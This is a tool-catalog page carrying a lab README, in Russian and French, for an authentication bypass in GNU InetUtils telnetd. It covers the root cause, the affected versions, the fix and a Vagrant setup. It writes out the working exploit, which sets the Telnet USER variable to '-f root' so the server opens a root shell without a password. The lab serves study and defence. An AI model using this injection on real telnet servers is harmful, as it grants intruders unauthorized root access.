Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061-lab — Лаборатория воспроизведения для CVE-2026-24061: критический обход аутентификации в GNU InetUtils telnetd. Предоставляет изолированную среду Vagrant для безопасной эксплуатации уязвимости внедрения NEW_ENVIRON USER. | Kitploit
Инструменты/GitHubGitHub/akpmarcelin/cve-2026-24061-lab
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеЛаборатории и Практика
GitHubakpmarcelin/cve-2026-24061-lab

CVE-2026-24061-lab

Лаборатория воспроизведения для CVE-2026-24061: критический обход аутентификации в GNU InetUtils telnetd. Предоставляет изолированную среду Vagrant для безопасной эксплуатации уязвимости внедрения NEW_ENVIRON USER.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 месяцев назадЕщё не проверено

CVE-2026-24061 — Лаборатория воспроизведения

⚠️ Только для образовательных целей. Изолированная лабораторная среда.

Français ci-dessous


Краткое описание

Критический обход аутентификации (CVSS 9.8) в GNU InetUtils telnetd ≤ 2.7. Внедряя -f root в качестве переменной USER через опцию Telnet NEW_ENVIRON, неаутентифицированный атакующий может получить root-оболочку без пароля.

Причина

Переменная USER, полученная от клиента во время согласования Telnet, передаётся напрямую в /usr/bin/login без проверки:

root@kitploit:~
/usr/bin/login -p -f root

Флаг -f указывает login пропустить проверку пароля для указанного пользователя. Этот риск задокументирован в RFC 1572 (Раздел 7) — однако ошибка присутствовала в inetutils более десяти лет.

Затронутые версии

GNU InetUtils telnetd 1.9.3 – 2.7

Исправление

Обновитесь до GNU InetUtils ≥ 2.7-2

Настройка лабораторной среды

Эта лаборатория использует Vagrant для развёртывания реальной изолированной виртуальной машины с уязвимой версией telnetd (inetutils 2.5, собранной из исходников), что максимально приближает её к реальной среде.

Требования: Vagrant + VirtualBox, установленные на вашей машине.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

ВМ запускается с IP-адресом 192.168.56.10, telnetd прослушивает порт 23.

Лаборатория подготовлена

Эксплуатация

С вашей хост-машины:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

Переменная USER внедряется через опцию Telnet NEW_ENVIRON во время фазы согласования — до появления приглашения login:.

Подключение к ВМ Получена root-оболочка

Ссылки

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet Environment Option
  • Исходный код GNU InetUtils — telnetd/sys_term.c

Автор

Agokoli



CVE-2026-24061 — Lab de démonstration

⚠️ Usage éducatif uniquement. Environnement isolé.

English above


Résumé

Contournement d'authentification critique (CVSS 9.8) dans GNU InetUtils telnetd ≤ 2.7. En injectant -f root comme valeur de la variable USER via l'option Telnet NEW_ENVIRON, un attaquant non authentifié peut obtenir un shell root sans aucun mot de passe.

Cause racine

La variable USER reçue du client pendant la négociation Telnet est passée directement à /usr/bin/login sans validation :

root@kitploit:~
/usr/bin/login -p -f root

Le flag -f indique à login de ne pas vérifier le mot de passe pour l'utilisateur donné. Ce risque est documenté dans la RFC 1572 (Section 7) — pourtant le bug est resté présent dans inetutils pendant plus d'une décennie.

Versions affectées

GNU InetUtils telnetd 1.9.3 à 2.7

Correctif

Mettre à jour vers GNU InetUtils ≥ 2.7-2

Mise en place du lab

Ce lab utilise Vagrant pour provisionner une vraie VM isolée faisant tourner la version vulnérable de telnetd (inetutils 2.5, compilé depuis les sources), afin d'être au plus proche d'un environnement réel.

Prérequis : Vagrant + VirtualBox installés sur votre machine.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

La VM démarre avec l'IP 192.168.56.10 et telnetd en écoute sur le port 23.

Lab provisionné

Exploitation

Depuis votre machine hôte :

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

La variable USER est injectée via l'option NEW_ENVIRON du protocole Telnet pendant la phase de négociation — avant même l'apparition du prompt login:.

Connexion à la VM Shell root obtenu

Références

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet Environment Option
  • Code source GNU InetUtils — telnetd/sys_term.c

Auteur

Agokoli

Скачать инструмент